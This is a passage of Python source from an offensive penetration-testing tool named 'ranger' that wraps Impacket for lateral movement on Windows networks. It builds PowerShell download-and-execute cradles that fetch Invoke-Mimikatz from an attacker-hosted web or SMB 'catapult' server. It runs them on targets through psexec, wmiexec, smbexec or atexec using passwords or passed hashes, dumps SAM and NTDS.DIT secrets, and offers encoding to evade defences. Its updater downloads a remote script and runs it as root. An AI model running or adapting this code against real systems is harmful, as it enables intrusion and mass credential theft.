text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
print(self.command) #DEBUG
print(self.unprotected_command) #DEBUG
'''
LOCAL INTERFACE DETECTION FUNCTIONS
'''
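# Thin wrappers around netifaces: enumerate interfaces and gateways, then build a
# per-interface dictionary of gateway, MAC address, IPv4 address, broadcast, and netmask
# values for each routable interface.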
def get_interfaces():
interfaces = netifaces.interfaces()
return interfaces
def get_gateways():
gateway_dict = {}
gws = netifaces.gateways()
for gw in gws:
try:
gateway_iface = gws[gw][netifaces.AF_INET]
gateway_ip, iface = gateway_iface[0], gateway_iface[1]
gw_list =[gateway_ip, iface]
gateway_dict[gw]=gw_list
except:
pass
return gateway_dict
def get_addresses(interface):
addrs = netifaces.ifaddresses(interface)
link_addr = addrs[netifaces.AF_LINK]
iface_addrs = addrs[netifaces.AF_INET]
iface_dict = iface_addrs[0]
link_dict = link_addr[0]
hwaddr = link_dict.get('addr')
iface_addr = iface_dict.get('addr')
iface_broadcast = iface_dict.get('broadcast')
iface_netmask = iface_dict.get('netmask')
return hwaddr, iface_addr, iface_broadcast, iface_netmask
def get_networks(gateways_dict):
networks_dict = {}
for key, value in gateways_dict.iteritems():
gateway_ip, iface = value[0], value[1]
hwaddress, addr, broadcast, netmask = get_addresses(iface)
network = {'gateway': gateway_ip, 'hwaddr' : hwaddress, 'addr' : addr, 'broadcast' : broadcast, 'netmask' : netmask}
networks_dict[iface] = network
return networks_dict
'''
HASH MANIPULATION FUNCTIONS
'''
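# Normalizes captured credentials into the LM:NTLM format expected by the Impacket wrappers
# above: pads malformed LM fields, warns about blank or truncated hashes, and clears the
# plaintext password once a usable hash string has been built.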
def hash_test(LM, NTLM, pwd, usr, verbose):
if verbose > 1:
print("[*] Hash detected for %s") % (usr)
blank_ntlm = re.search(r'31d6cfe0d16ae931b73c59d7e0c089c0',NTLM, re.IGNORECASE)
blank_lm = re.search(r'aad3b435b51404eeaad3b435b51404ee',LM, re.IGNORECASE)
blank_lm_instances = len(re.findall(r'aad3b435b51404ee', LM, re.IGNORECASE))
bad_format = re.search(r'NOPASSWORD',LM, re.IGNORECASE)
if bad_format:
if verbose > 1:
print("[*] The hash for %s was badly formatted, so padding it") % (usr)
LM = "aad3b435b51404eeaad3b435b51404ee"
if blank_lm and blank_ntlm:
if verbose > 1:
print("[*] You do know the password for %s is blank right?") % (usr)
elif blank_lm_instances == 1 and not blank_lm:
if verbose > 1:
print("[*] The hashed password for %s is less than eight characters") % (usr)
elif blank_lm and not blank_ntlm:
if verbose > 1:
print("[*] LM hashes are disabled for %s, so focus on cracking the NTLM") % (usr)
hash = LM + ":" + NTLM
if verbose > 1:
print("[*] Your formatted hash for %s is: %s") % (usr, hash)
pwd = ""
return(LM, NTLM, pwd, hash)
'''
CATAPULT SERVER FUNCTIONS
'''
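# Payload delivery helpers: delivery_server() dispatches to either a SimpleHTTPServer
# subprocess rooted in the working directory (web delivery) or an Impacket SimpleSMBServer
# share (smb delivery), returning the process handle so callers can terminate it once the
# attack finishes.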
def delivery_server(port, working_dir, delivery_method, share_name):
sub_proc = None
if delivery_method == "web":
sub_proc = http_server(port, working_dir)
if delivery_method == "smb":
sub_proc = smb_server(working_dir, share_name)
return sub_proc
def http_server(port, working_dir):
devnull = open(os.devnull, 'w')
sub_proc = subprocess.Popen([sys.executable, '-m', 'SimpleHTTPServer', port], cwd=working_dir, stdout=devnull, stderr=devnull)
#sub_proc = subprocess.Popen([sys.executable, '-m', 'SimpleHTTPServer', port], cwd=working_dir)
#Test Server
test_request = "http://127.0.0.1:%s" % (port)
time.sleep(1) #DEBUG
try:
urllib2.urlopen(test_request).read()
print("[*] Catapult web server started successfully on port: %s in directory: %s") % (port, working_dir)
except Exception, e:
print("[!] Catapult web server failed to start")
print("[*] Verify the port is not already in use")
sub_proc.terminate()
sub_proc = None
return sub_proc
def smb_server(working_dir, share_name):
note = ''
sub_proc = None
try:
smb_srv = smbserver.SimpleSMBServer()
smb_srv.addShare(share_name.upper(), working_dir, note)
smb_srv.setSMB2Support(False)
smb_srv.setSMBChallenge('')
smb_srv.setLogFile('')
sub_proc = subprocess.Popen([smb_srv.start()])
except Exception, e:
print("[!] Catapult smb server failed to start")
# TODO: ADD IN TEST CASE FOR VERIFYING SMB SERVER STARTED USING pysmb
return sub_proc
'''
METHOD FUNCTIONS
'''
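# Per-technique drivers: each *_func below optionally verifies the target port, stands up a
# catapult delivery server when a payload is being staged, invokes the matching Impacket
# wrapper (ATSVC_EXEC, PSEXEC, CMDEXEC) under the Timeout guard where applicable, and tears
# the delivery server down afterwards.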
def atexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, scan_type, verbose, verify_port, encoder, timeout_value):
srv = None
if hash and not pwd:
print("[-] --atexec requires a password, please try a different user or crack hash %s for user %s") % (hash, usr)
return
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] Please provide a viable command for execution")
if attacks and encoder:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
with Timeout(timeout_value):
try:
shell = ATSVC_EXEC(username = usr, password = pwd, domain = dom, command = command, proto = protocol)
shell.play(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
elif attacks and not encoder:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
with Timeout(timeout_value):
try:
shell = ATSVC_EXEC(username = usr, password = pwd, domain = dom, command = unprotected_command, proto = protocol)
shell.play(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
else:
with Timeout(timeout_value):
try:
shell = ATSVC_EXEC(username = usr, password = pwd, domain = dom, command = unprotected_command, proto = protocol)
shell.play(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s" % (str(delivery), str(dst)))
def psexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, timeout_value):
srv = None
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if attacks:
#print(instructions)
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
try:
shell = PSEXEC(command, path=directory, protocols=protocol, username = usr, password = pwd, domain = dom, hashes = hash, copyFile = None, exeFile = None, aesKey = aes, doKerberos = kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
def smbexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, scan_type, verbose, verify_port, timeout_value):
srv = None
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if attacks:
print(instructions)
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
try:
shell = CMDEXEC(protocols = protocol, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, doKerberos = kerberos, mode = mode, share = share)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
def wmiexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, no_output, scan_type, verbose, verify_port, encoder, timeout_value):
srv = None
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if attacks and encoder:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
shell = WMIEXEC(unprotected_command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occurred: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return #replaced continue inside a function
elif attacks and not encoder:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
shell = WMIEXEC(unprotected_command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occurred: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return #changed from continue inside a function
elif attacks:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
shell = WMIEXEC(command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occurred: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return # changed from continue inside a function
else:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
shell = WMIEXEC(command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return # changed from continue inside a function
def netview_func(dst, usr, pwd, dom, hash, aes, kerberos, final_targets, methods, scan_type, verbose, verify_port, timeout_value):
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if methods:
sys.exit("[!] The --scout option is run without methods")
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
opted = NetviewDetails(user = None, users = None, target = dst, targets = None, noloop = True, delay = '10', max_connections = '1000', domainController = None, debug = False)
try:
shell = USERENUM(username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, doKerberos = kerberos, options=opted)
shell.run()
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
return
def sam_dump_func(dst, usr, hash, dom, aes, kerberos, system, security, sam, ntds, pwd, scan_type, verbose, verify_port, timeout_value):
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
shell = DumpSecrets(address = dst, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, doKerberos = kerberos, system = system, security = security, sam = sam, ntds = ntds)
try:
shell.dump()
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured during execution")
return
def instructions_func(payload, src_port, command, unprotected_command, smbexec_cmd, execution, delivery):
    instructions = ""
    if "web" in delivery and ("invoker" in execution or "executor" in execution):
prep = '''[*] Place the PowerShell script ''' + str(payload) + ''' in an empty directory, or use the default /opt/ranger/web.
[*] Start your Python web server as follows: python -m SimpleHTTPServer ''' + str(src_port) + '''.'''
        post = '''\n[*] Copy and paste one of the following commands into the target box's command shell.
[+] This command is unencoded:\n''' + unprotected_command + '''\n
[+] This command is double encoded:\n''' +command
if smbexec_cmd:
instructions = post
else:
instructions = prep + post
elif "smb" in delivery and "invoker" or "executor" in execution:
prep = '''[*] Place the PowerShell script ''' + str(payload) + ''' in an empty directory, or use the default /opt/ranger/smb.
[*] Start-up your samba server.'''
        post = '''[*] Copy and paste one of the following commands into the target box's command shell.
[+] This command is unencoded:\n''' + unprotected_command + '''\n
[+] This command is double encoded:\n''' + command
if smbexec_cmd:
instructions = post
else:
instructions = prep + post
elif "downloader" in execution:
prep = '''[*] If you have not already done this, start-up your Metasploit module exploit/multi/script/web_delivery.
[*] Make sure to select the PowerShell and copy the payload name for this script and set the URIPATH to /.'''
        post = '''[*] Copy and paste one of the following commands into the target box's command shell.
[+] This command is unencoded:\n''' + unprotected_command + '''\n
[+] This command is double encoded:\n''' +command
if smbexec_cmd:
instructions = post
else:
instructions = prep + post
return(instructions)
'''
NMAP FUNCTIONS
'''
def unique_host_dict(hosts, verbose):
count = 0
hosts_dict = {}
processed_hosts = {}
if not hosts:
sys.exit("[!] There was an issue processing the data")
for inst in hosts:
hosts_temp = inst.hosts_return()
if hosts_temp is not None:
for k, v in hosts_temp.iteritems():
hosts_dict[count] = v
count+=1
hosts_temp.clear()
if verbose > 2:
for key, value in hosts_dict.iteritems():
print("[*] Key: %s Value: %s") % (key,value)
temp = [(k, hosts_dict[k]) for k in hosts_dict]
temp.sort()
key = 0
for k, v in temp:
compare = lambda x, y: collections.Counter(x) == collections.Counter(y)
if str(v) in str(processed_hosts.values()):
continue
else:
key+=1
processed_hosts[key] = v
return(processed_hosts)
def xml_list_process(xml, verbose):
xml_list = []
hosts = []
# Instantiation for proof of concept
if "," in xml:
xml_list = xml.split(',')
else:
xml_list.append(xml)
for x in xml_list:
try:
tree_temp = etree.parse(x)
except:
sys.exit("[!] Cannot open XML file: %s \n[-] Ensure that your are passing the correct file and format" % (x))
try:
root = tree_temp.getroot()
name = root.get("scanner")
if name is not None and "nmap" in name:
if verbose > 1:
print ("[*] File being processed is an NMAP XML")
hosts.append(Nmap_parser(x, verbose))
else:
print("[!] File % is not an NMAP XML") % (str(x))
sys.exit(1)
except Exception, e:
print("[!] Processing of file %s failed %s") % (str(x), str(e))
sys.exit(1)
processed_hosts = unique_host_dict(hosts, verbose)
return(processed_hosts)
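# Sketch of the structure returned above, inferred from how the callers below
# index each entry (hostname, IP, protocol, port, service, MAC address, state);
# the values shown are placeholders.
# processed_hosts = {1: ['dc01', '192.168.1.10', 'tcp', '445', 'microsoft-ds', 'AA:BB:CC:DD:EE:FF', 'open']}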
def verify_open(verbose, scan_type, port, dst):
nm = nmap.PortScanner()
if "tcp" in scan_type:
if verbose > 1:
print("[*] Checking to see if the port %s is open on %s by TCP Connect scan") % (port, dst)
scan_args = '-sT -p %s' % (port)
nm.scan(hosts=dst, arguments=scan_args)
elif "syn" in scan_type:
if verbose > 1:
print("[*] Checking to see if the port %s is open on %s by SYN Scan scan") % (port, dst)
scan_args = '-sS -p %s' % (port)
nm.scan(hosts=dst, arguments=scan_args)
try:
output = nm[dst]['tcp'][int(port)]['state']
except Exception, e:
output = "closed"
if "open" in output:
return(True)
else:
return(False)
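# Hedged usage sketch (not called anywhere): verify_open() returns True only
# when the nmap scan reports the port as open; the target below is a placeholder.
def _example_verify_open_usage():
    if verify_open(verbose=2, scan_type="tcp", port="445", dst="192.168.1.10"):
        print("[*] 192.168.1.10 is listening on 445/tcp")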
def pwd_test(pwd, verbose, usr = None):
SID = None
NTLM = ""
LM = ""
hash = None
if pwd and ":" in pwd and pwd.count(':') == 6:
pwdump_format_hash = pwd.split(':')
if not usr:
usr = pwdump_format_hash[0].lower()
SID = pwdump_format_hash[1]
LM = pwdump_format_hash[2]
NTLM = pwdump_format_hash[3]
pwd = None
if re.match('[0-9A-Fa-f]{32}', LM) or re.match('[0-9A-Fa-f]{32}', NTLM):
LM, NTLM, pwd, hash = hash_test(LM, NTLM, pwd, usr, verbose)
if pwd and ":" in pwd and pwd.count(':') == 1:
if pwd.startswith(':'):
LM, NTLM = pwd.split(':')
if LM == "":
LM = "aad3b435b51404eeaad3b435b51404ee"
else:
LM, NTLM = pwd.split(':')
if re.match('[0-9A-Fa-f]{32}', LM) or re.match('[0-9A-Fa-f]{32}', NTLM):
LM, NTLM, pwd, hash = hash_test(LM, NTLM, pwd, usr, verbose)
return(SID, LM, NTLM, hash, usr, pwd)
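# Hedged usage sketch (not called anywhere) of the two credential formats
# pwd_test() accepts; the sample hashes are the well-known blank LM/NTLM pads.
def _example_pwd_test_usage():
    # Metasploit PWDUMP format: user:SID:LM:NTLM:::
    pwd_test("admin:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::", 1)
    # Bare LM:NTLM pair with an explicit username
    pwd_test("aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", 1, "admin")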
def is_empty(structure):
if structure:
return False
else:
return True
def method_func(psexec_cmd, wmiexec_cmd, netview_cmd, smbexec_cmd, atexec_cmd, sam_dump, dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, final_targets, system, security, sam, ntds, no_output, encoder, timeout_value, sleep_value):
if psexec_cmd:
for dst in final_targets:
psexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, timeout_value)
time.sleep(sleep_value)
elif wmiexec_cmd:
for dst in final_targets:
wmiexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, no_output, scan_type, verbose, verify_port, encoder, timeout_value)
time.sleep(sleep_value)
elif netview_cmd:
for dst in final_targets:
            netview_func(dst, usr, pwd, dom, hash, aes, kerberos, final_targets, False, scan_type, verbose, verify_port, timeout_value)  # the methods flag is always False when this branch is reached
time.sleep(sleep_value)
elif smbexec_cmd:
for dst in final_targets:
smbexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, scan_type, verbose, verify_port, timeout_value)
time.sleep(sleep_value)
elif atexec_cmd:
for dst in final_targets:
atexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, scan_type, verbose, verify_port, encoder, timeout_value)
time.sleep(sleep_value)
elif sam_dump:
for dst in final_targets:
sam_dump_func(dst, usr, hash, dom, aes, kerberos, system, security, sam, ntds, pwd, scan_type, verbose, verify_port, timeout_value)
time.sleep(sleep_value)
else:
print(instructions)
def main():
# If script is executed at the CLI
usage = '''
Find Logged In Users
%(prog)s [--usr Administrator] [--pwd Password1] [-dom Domain] --scout
Command Shell:
%(prog)s [--usr Administrator] [--pwd Password1] [-dom Domain] [-t target] --smbexec -q -v -vv -vvv
Attack Directly:
%(prog)s [--usr Administrator] [--pwd Password1] [-dom Domain] [-t target] --wmiexec --invoker
Create Pasteable Double Encoded Script:
%(prog)s --invoker -q -v -vv -vvv
'''
    parser = argparse.ArgumentParser(usage=usage, description="A wrapping and execution tool for some of the most useful impacket tools", epilog="This script combines specific attacks with dynamic methods, which allow you to bypass many protective measures.")
group1 = parser.add_argument_group('Method')
group2 = parser.add_argument_group('Attack')
group3 = parser.add_argument_group('SAM and NTDS.DIT Options, used with --secrets-dump')
iex_options = parser.add_argument_group('Payload options to tell ranger where to source the attack information')
remote_attack = parser.add_argument_group('Remote Target Options')
    #generator = parser.add_argument_group('Filename for randomization of script')
    obfiscation = parser.add_argument_group('Tools to obfuscate the execution of scripts')
method = group1.add_mutually_exclusive_group()
attack = group2.add_mutually_exclusive_group()
sam_dump_options = group3.add_mutually_exclusive_group()
iex_options.add_argument("-i", action="store", dest="src_ip", default=None, help="Sets the IP address your attacks will come from defaults to eth0 IP")
iex_options.add_argument("-n", action="store", dest="interface", default="eth0", help="Sets the interface your attacks will come from if you do not use the default, default eth0")
iex_options.add_argument("-p", action="store", dest="src_port", default="8000", help="Set the port the Mimikatz server is on, defaults to port 8000")
iex_options.add_argument("-x", action="store", dest="payload", default=None, help="The name of the file to injected, the default is Invoke-Mimikatz.ps1")
iex_options.add_argument("-a", action="store", dest="mim_arg", default=None, help="Allows you to set the argument")
iex_options.add_argument("-f", action="store", dest="mim_func", default=None, help="Allows you to set the function or cmdlet name")
attack.add_argument("--invoker", action="store_true", dest="invoker", help="Executes Mimikatz-Invoker against target systtems")
attack.add_argument("--downloader", action="store_true", dest="downloader", help="Configures the command to use Metasploit's exploit/multi/script/web_delivery")
attack.add_argument("--secrets-dump", action="store_true", dest="sam_dump", help="Execute a SAM table dump")
attack.add_argument("--executor", action="store_true", dest="executor", help="Execute a PowerShell Script")
attack.add_argument("--command", action="store", dest="command", default="cmd.exe", help="Set the command that will be executed, default is cmd.exe")
attack.add_argument("--domain-group-members", action="store", dest="domain_group", help="Identifies members of Domain Groups through PowerShell")
attack.add_argument("--local-group-members", action="store", dest="local_group", help="Identifies members of Local Groups through PowerShell")
attack.add_argument("--get-domain", action="store_true", dest="get_domain", default=False, help="Identifies current user's Domain")
attack.add_argument("--get-forest-domains", action="store_true", dest="get_forest_domains", default=False, help="Identifies current user's Domains within the Forest")
attack.add_argument("--get-forest", action="store_true", dest="get_forest", default=False, help="Identifies current user's Forrest")
attack.add_argument("--get-dc", action="store_true", dest="get_dc", default=False, help="Identifies current user's Domain Controllers")
attack.add_argument("--find-la-access", action="store_true", dest="find_local_admin_access", default=False, help="Identifies systems the current user has local admin access to")
remote_attack.add_argument("-t", action="store", dest="target", default=None, help="The targets you are attempting to exploit, multiple items can be comma seperated: Accepts IPs, CIDR, Short and Long Ranges")
remote_attack.add_argument("-e", action="store", dest="exceptor", default=None, help="The exceptions to the targets you do not want to exploit, yours is inlcuded by default, multiple items can be comma seperated: Accepts IPs, CIDR, Short and Long Ranges")
remote_attack.add_argument("-tl", action="store", dest="target_filename", default=None, help="The targets file with systems you want to exploit, delinated by new lines, multiple files can be comma separated")
remote_attack.add_argument("-el", action="store", dest="exception_filename", default=None, help="The exceptions file with systems you do not want to exploit, delinated by new lines, multiple files can be comma separated")
remote_attack.add_argument("-tnX", action="store", dest="xml_targets", default=None, help="The targets nmap XML with systems you want to exploit, multiple files can be comma separated")
remote_attack.add_argument("-enX", action="store", dest="xml_exceptions", default=None, help="The exceptions nmap XML with systems you do not want to exploit, multiple files can be comma separted")
remote_attack.add_argument("-sT", action="store_true", dest="scan_tcp", default=False, help="Verify the port is open with nmap TCP Connection scan prior to exploitation")
remote_attack.add_argument("-sS", action="store_true", dest="scan_syn", default=False, help="Verify the port is open with nmap SYN Stealth scan prior to exploitation")
remote_attack.add_argument("--dom", action="store", dest="dom", default="WORKGROUP", help="The domain the user is apart of, defaults to WORKGROUP")
remote_attack.add_argument("--usr", action="store", dest="usr", default=None, help="The username that will be used to exploit the system")
remote_attack.add_argument("--pwd", action="store", dest="pwd", default=None, help="The password that will be used to exploit the system")
remote_attack.add_argument("--creds-file", action="store", dest="creds_file", default=None, help="A file with multiple lines of credentials with each element deliniated by a space, domains are optional in the file, and can be applied universally to all creds with the --dom argument, the same hash formats accepted by command line are accepted in the file to include Metasploit PWDUMP, Metasploit hash_dump and smart_hash_dump formats, each line of the file should be formated as one of the following: username password, username hash, username password domain, username hash, Hash_in_PWDUMP_format, Hash_in_PWDUMP_format domain")
method.add_argument("--psexec", action="store_true", dest="psexec_cmd", help="Inject the invoker process into the system memory with psexec")
method.add_argument("--wmiexec", action="store_true", dest="wmiexec_cmd", help="Inject the invoker process into the system memory with wmiexec")
method.add_argument("--smbexec", action="store_true", dest="smbexec_cmd", help="Inject the invoker process into the system memory with smbexec")
method.add_argument("--atexec", action="store_true", dest="atexec_cmd", help="Inject the command task into the system memory with at on systems older than Vista")
attack.add_argument("--scout", action="store_true", dest="netview_cmd", help="Identify logged in users on a target machine")
#generator.add_argument("--filename", action="store", dest="filename", default=None, help="The file that the attack script will be dumped to")
remote_attack.add_argument("--domain", action="store", dest="target_dom", default=None, help="When querying for details of different domains")
remote_attack.add_argument("--aes", action="store", dest="aes_key", default=None, help="The AES Key Option")
remote_attack.add_argument("--share", action="store", default="ADMIN$", dest="share", help="The Share to execute against, the default is ADMIN$")
remote_attack.add_argument('--mode', action="store", dest="mode", choices=['SERVER','SHARE'], default="SERVER", help="Mode to use for --smbexec, default is SERVER, which requires root access, SHARE does not")
remote_attack.add_argument("--protocol", action="store", dest="protocol", choices=['445/SMB','139/SMB'], default="445/SMB", help="The protocol to attack over, the default is 445/SMB")
remote_attack.add_argument("--directory", action="store", dest="directory", default="C:\\", help="The directory to either drop the payload or instantiate the session")
remote_attack.add_argument("--timeout", action="store", dest="timeout_value", default=30, help="How long you want a test to wait before it is cancelled, the default is 30 seconds")
remote_attack.add_argument("--sleep", action="store", dest="sleep_value", default=0, help="How many seconds you want to delay each iteration of tests when multiple hosts or credentials are provided, the default is 0")
sam_dump_options.add_argument("--system", action="store", help="The SYSTEM hive to parse")
sam_dump_options.add_argument("--security", action="store", help="The SECURITY hive to parse")
sam_dump_options.add_argument("--sam", action="store", help="The SAM hive to parse")
sam_dump_options.add_argument("--ntds", action="store", help="The NTDS.DIT file to parse")
obfiscation.add_argument("--encoder", action="store_true", help="Set to encode the commands that are being executed")
#obfiscation.add_argument("--delivery", action="store", dest="delivery", choices=['web','smb'], default="web", help="Set the type of catapult server the payload will be downloaded from, web or smb")
obfiscation.add_argument("--share-name", action="store", dest="share_name", default="ranger", help="Provide a specific share name to reference with SMB delivery")
parser.add_argument("-l", "--logfile", action="store", dest="log", default="/opt/ranger/log/results.log", type=str, help="The log file to output the results")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument("--update", action="store_true", dest="update", default=False, help="Updates ranger and the supporting libraries")
parser.add_argument('--version', action='version', version='%(prog)s 0.43b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if args.update:
try:
os.system("wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh -O /root/setup.sh && chmod a+x /root/setup.sh")
except Exception, e:
print("[!] An error occurred downloading the update files: %s") % (e)
try:
os.system("/root/setup.sh && rm /root/setup.sh")
except Exception, e:
print("[!] An error occurred when executing the installation script: %s") % (e)
# Set Constructors
verbose = args.verbose # Verbosity level
